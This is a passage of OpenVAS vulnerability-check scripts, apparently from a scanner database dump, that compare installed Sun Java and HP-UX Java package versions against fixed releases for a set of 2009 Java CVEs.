See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800975\");\n script_version(\"2019-04-29T15:08:03+0000\");\n script_tag(name:\"last_modification\", value:\"2019-04-29 15:08:03 +0000 (Mon, 29 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2009-11-13 15:48:12 +0100 (Fri, 13 Nov 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-3877\", \"CVE-2009-3876\", \"CVE-2009-3875\", \"CVE-2009-3873\",\n \"CVE-2009-3874\", \"CVE-2009-3872\", \"CVE-2009-3871\", \"CVE-2009-3869\",\n \"CVE-2009-3868\", \"CVE-2009-3867\");\n script_bugtraq_id(36881);\n script_name(\"Sun Java JDK/JRE Multiple Vulnerabilities - Nov09 (Linux)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/37231\");\n script_xref(name:\"URL\", value:\"http://java.sun.com/javase/6/webnotes/6u17.html\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2009/3131\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_java_prdts_detect_lin.nasl\");\n script_mandatory_keys(\"Sun/Java/JRE/Linux/Ver\");\n script_tag(name:\"impact\", value:\"Successful exploitation allows remote attacker to execute arbitrary code,\n gain escalated privileges, bypass security restrictions and cause denial\n of service attacks inside the context of the affected system.\");\n script_tag(name:\"affected\", value:\"Sun Java JDK/JRE 6 prior to 6 Update 17\n\n Sun Java JDK/JRE 5 prior to 5 Update 22\n\n Sun Java 
JDK/JRE 1.4.x prior to 1.4.2_24\n\n Sun Java JDK/JRE 1.3.x prior to 1.3.1_27 on Linux.\");\n script_tag(name:\"insight\", value:\"Multiple flaws occur due to,\n\n - Error when decoding 'DER' encoded data and parsing HTTP headers.\n\n - Error when verifying 'HMAC' digests.\n\n - Integer overflow error in the 'JPEG JFIF' Decoder while processing\n malicious image files.\n\n - A buffer overflow error in the 'setDiffICM()' and 'setBytePixels()'\n functions in the Abstract Window Toolkit (AWT).\n\n - Unspecified error due to improper parsing of color profiles of images.\n\n - A buffer overflow error due to improper implementation of the\n 'HsbParser.getSoundBank()' function.\n\n - Three unspecified errors when processing audio or image files.\");\n script_tag(name:\"solution\", value:\"Upgrade to JDK/JRE version 6 Update 17 or later,\n\n Upgrade to JDK/JRE version 5 Update 22\n\n Upgrade to JDK/JRE version 1.4.2_24\n\n Upgrade to JDK/JRE version 1.3.1_27\");\n script_tag(name:\"summary\", value:\"This host is installed with Sun Java JDK/JRE and is prone to\n multiple vulnerabilities.\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\njreVer = get_kb_item(\"Sun/Java/JRE/Linux/Ver\");\nif(!jreVer)\n exit(0);\n\n# and 1.6 < 1.6.0_17 (6 Update 17)\nif(version_in_range(version:jreVer, test_version:\"1.3\", test_version2:\"1.3.1.26\")||\n version_in_range(version:jreVer, test_version:\"1.4\", test_version2:\"1.4.2.23\")||\n version_in_range(version:jreVer, test_version:\"1.5\", test_version2:\"1.5.0.21\")||\n version_in_range(version:jreVer, test_version:\"1.6\", test_version2:\"1.6.0.16\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-02T10:54:28", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", 
"CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "description": "Check for the Version of Java", "modified": "2017-12-22T00:00:00", "published": "2010-02-15T00:00:00", "id": "OPENVAS:835225", "href": "http://plugins.openvas.org/nasl.php?oid=835225", "type": "openvas", "title": "HP-UX Update for Java HPSBUX02503", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Java HPSBUX02503\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote Increase in privilege\n Denial of Service and other vulnerabilities\";\ntag_affected = \"Java on\n HP-UX B.11.11, B.11.23, B.11.31 running HP JDK and JRE 6.0.05 or earlier \n HP-UX B.11.11, B.11.23, B.11.31 running HP JDK and JRE 5.0.18 or earlier \n HP-UX B.11.11, B.11.23, B.11.31 running HP Java SDK and RTE 1.4.2.23 or \n earlier\";\ntag_insight = \"Potential security vulnerabilities have been identified in Java Runtime \n Environment (JRE) and Java Developer Kit (JDK) running on HP-UX. These \n vulnerabilities could allow remote unauthorized access, privilege \n escalation, and Denial of Service (DoS)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01997760\");\n script_id(835225);\n script_version(\"$Revision: 8226 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-22 07:30:26 +0100 (Fri, 22 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-02-15 16:07:49 +0100 (Mon, 15 Feb 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"HPSBUX\", value: \"02503\");\n script_cve_id(\"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n script_name(\"HP-UX Update for Java HPSBUX02503\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of 
Java\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.31\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-COM\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32\", 
revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-COM\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF32\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF64\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA11\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20W\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-COM\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20W\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-COM\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF32\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF64\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-COM\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-COM\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF32\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF64\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20W\", revision:\"1.6.0.06.00\", 
rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-COM\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
ishpuxpkgvuln(pkg:\"Jdk14.JDK14-COM\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF32\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF64\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA11\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20W\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-COM\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32-HS\", revision:\"1.5.0.19.00\", 
rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20W\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-COM\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF32\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF64\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-COM\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n 
}\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-COM\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF32\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF64\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20W\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-COM\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-COM\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF32\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF64\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA11\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
